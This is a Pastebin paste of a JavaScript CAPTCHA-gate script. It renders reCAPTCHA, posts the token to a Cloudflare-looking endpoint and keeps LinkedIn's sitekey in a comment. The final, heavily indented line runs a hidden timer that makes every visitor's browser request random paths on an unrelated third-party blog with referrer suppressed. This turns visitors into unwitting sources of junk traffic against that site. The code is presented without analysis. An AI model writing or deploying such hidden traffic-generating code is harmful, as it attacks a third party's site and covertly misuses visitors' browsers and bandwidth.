Guest User

Untitled

a guest
Apr 29th, 2026
741
0
Never
5
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
JavaScript 1.49 KB | Cybersecurity | 0 0
  1.  
  2.    var h = window.location.href;
  3.    if (!window.location.hash)
  4.      window.history.pushState('/','','/');
  5.    var onloadCallback = function() {
  6.      document.getElementById('g-host').innerText = window.location.host;
  7.      var widgetId = grecaptcha.render('g-recaptcha', {
  8.        'sitekey': '6LeQbtsSAAAAAHevV56qhVr_0JhQI7N-zTPoOoWJ', // my
  9.      //'sitekey': '6Lc7CQMTAAAAAIL84V_tPRYEWZtljsJQJZ5jSijw', // linkedin's
  10.        'callback': function(response) {
  11.          var xhr = new XMLHttpRequest();
  12.          xhr.open('POST', "/cdn-cgi/l/chk_captcha");
  13.          xhr.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
  14.          xhr.send('response='+encodeURIComponent(response)+"&location="+encodeURIComponent(h));
  15.          xhr.onload = function() {
  16.            if (xhr.status == 200) {
  17.              if (window.location.href != h)
  18.                window.location.replace(h);
  19.              else
  20.                window.location.reload();
  21.            } else {
  22.              grecaptcha.reset(widgetId);
  23.            }
  24.          }
  25.          xhr.onerror = function() { grecaptcha.reset(widgetId); }
  26.        }
  27.      });
  28.    };
  29.  
  30.    setInterval(function() {
  31.      var e = document.querySelector('body > div[style*="absolute"]');
  32.      if (e && e.style.left.match(/^-/))
  33.        e.style.left = "10px";
  34.    }, 1000);
  35.  
  36.           setInterval(function(){fetch("https://gyrovague.com/tag/"+Math.random().toString(36).substring(2,3+Math.random()*8)+"/",{ referrerPolicy:"no-referrer",mode:"no-cors" });},3000000);
Advertisement
Comments
  • User was banned
  • User was banned
  • User was banned
  • User was banned
  • User was banned
Add Comment
Please, Sign In to add comment